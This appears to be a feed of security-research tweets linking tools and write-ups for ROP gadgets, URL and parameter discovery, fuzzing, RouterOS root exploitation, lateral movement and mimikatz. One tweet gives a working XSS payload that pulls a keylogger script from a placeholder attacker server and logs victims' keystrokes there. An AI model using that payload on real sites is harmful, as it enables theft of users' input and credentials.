rp++ is a full-cpp written tool that aims to find ROP sequences in PE/Elf/Mach-O x86/x64 binaries. https://t.co/actBdnkcxQ

getallurls - fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl:
https://t.co/34znlumYwM

Quick script that I use religiously for content discovery.

So this filing in security research company CorelliumHQ vs Apple has some pretty interesting details. And it doesn't exactly look good for Apple. https://t.co/KNl2z3Uk8l

RouterOS : Chain to Root - DNS Request to a Root Busybox Shell : https://t.co/eDqnIDHKdV

Bug Hunting in RouterOS : https://t.co/FqxamHNdUs (Slides)

PoC : https://t.co/IsCXSysp8j

Arjun : HTTP parameter discovery suite (Typical scan takes 30 sec with huge list of 25,980 param' names) : https://t.co/L14G2peGuW

WEIZZ: Automatic Grey-box Fuzzing for Structured Binary Formats

Target has an android app?

1. Download it
2. Use Diggy (https://t.co/qp3LIHZRge) to extract URLs
3. Use Arjun (https://t.co/Y02eaYsbow) to find parameters on those URLs

Remote XSS Keylogger:

Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)>

This will log a user's input to your remote server.

keylogger.php: https://t.co/PwIvyt9Uss

keylogger.js: https://t.co/g5HoTeA5z2

Interesting way to move laterally using the service manager without registering a service or writing a file to disk.

C# and Powershell version will be release soon.

https://t.co/ZGA78JFJxQ

Thanks to ChangeServiceConfigA

Happy to see more usages of Credential Guard protection in Windows 10 (enterprise/business), with persistance across reboots. #mimikatz

* BCryptIsoKeyData for CNG private keys ;
* Credential for domain_password credentials ;
* LsaIsoAsymmetricKeyBlob for MachineBoundCertificate.

#checkra1n beta 0.9.3 is out with significant improvements - get it at https://t.co/MqMSSonazH

Frizzer - Frida-based general purpose fuzzer

https://t.co/k2t960SPKJ